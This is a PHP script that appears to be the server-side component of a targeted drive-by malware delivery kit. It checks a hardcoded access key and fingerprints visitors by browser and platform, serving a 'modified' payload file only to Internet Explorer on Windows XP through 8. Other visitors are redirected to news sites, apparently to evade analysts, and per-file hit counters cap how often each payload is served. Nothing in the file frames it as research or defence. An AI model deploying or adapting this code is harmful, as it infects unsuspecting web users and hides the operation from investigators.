<?php

function endsWith($haystack, $needle)
{
    return substr($haystack, -strlen($needle)) == $needle;
}

function getRedirLocation($basedir)
{
	$url = file_get_contents($basedir.'/cnt/'.'redir');
	if ($url != FALSE)
		return $url;

	$locations = array(
		1 => 'http://www.cnn.com/',
		2 => 'http://guardian.co.uk',
		3 => 'http://www.ft.com/home/middleeast',
		4 => 'http://online.wsj.com/public/page/news-global-world.html',
	);
	return $locations[array_rand($locations)];
}

function change_html($basedir)
{
	$conf = '';
	$handle = opendir($basedir);
	while (false !== ($entry = readdir($handle)))
	{
		if(endsWith($entry, ".html"))
		{
			eval(file_get_contents($basedir.'/'.$entry));
			$conf['hits'] = 0;			
			file_put_contents($basedir.'/'.$entry, '$conf = '.var_export($conf, true).';');
		}
	}
}

function invalidate($basedir)
{
	$conf = '';
	$handle = opendir($basedir);
	while (false !== ($entry = readdir($handle))) 
	{
		if ($entry === ".")
			continue;
		if ($entry === "..")
			continue;
		if ($entry === "cnt")
			continue;
		

		eval(file_get_contents($basedir.'/'.$entry));
		if($conf['hits'] > 0)
		{
			$conf['hits']--;
		}
		file_put_contents($basedir.'/'.$entry, '$conf = '.var_export($conf, true).';');
	}
}

if(!isset($_GET['key']) || ($_GET['key'] != 'YXNqaWFvaXNjYXMK')) {
   header("HTTP/1.0 404 Not Found");
   exit();
}

if(!isset($_GET['conf']) || !is_file('files/'.$_GET['conf'])) {
   header("HTTP/1.0 404 Not Found");
   exit();
}

$conffile = 'files/'.$_GET['conf'];
eval(file_get_contents($conffile));

$infect = true;

if(isset($conf['hits'])) {
   if($conf['hits'] > 0) {
      $conf['hits']--;
   } else {
      $infect = false;
   }
}
if(isset($conf['browsercheck']) && $conf['browsercheck']) {
   $info = get_browser();
   if(!in_array($info->platform, array('WinXP', 'WinVista', 'Win7', 'Win8')))
	 $infect = false;
   //if(strpos($info->browser_name_regex, "win64") != FALSE)
   //	$infect = false;
   if ($info->browser != 'IE')
	$infect = false;
   if($conf['x64'] && strpos($info->browser_name_regex, "win64") != FALSE)
	$infect = false;
}

$basedir = dirname($conffile).'/';

if($infect && isset($conf['modified']) && is_file($basedir.$conf['modified'])) {
   file_put_contents($conffile, '$conf = '.var_export($conf, true).';');
   $file = $basedir.$conf['modified'];
}
else if(!$infect && isset($conf['original'])) 
{
	header('Location: '.getRedirLocation($basedir));
	exit;
}

if($file) {

   header('Content-Type: '.(isset($conf['content-type']) ? $conf['content-type'] : 'application/octet-stream'));
   header('Content-Length: '.filesize($file));
   readfile($file);
   if (isset($conf['master']) && $conf['master'])
   {
   	invalidate($basedir);
   }
   if (endsWith($file, ".swf"))
   {
	if (!isset($conf['gogo']))
	change_html($basedir);
   }
} 
else 
{
   header("HTTP/1.0 404 Not Found");
}

?>
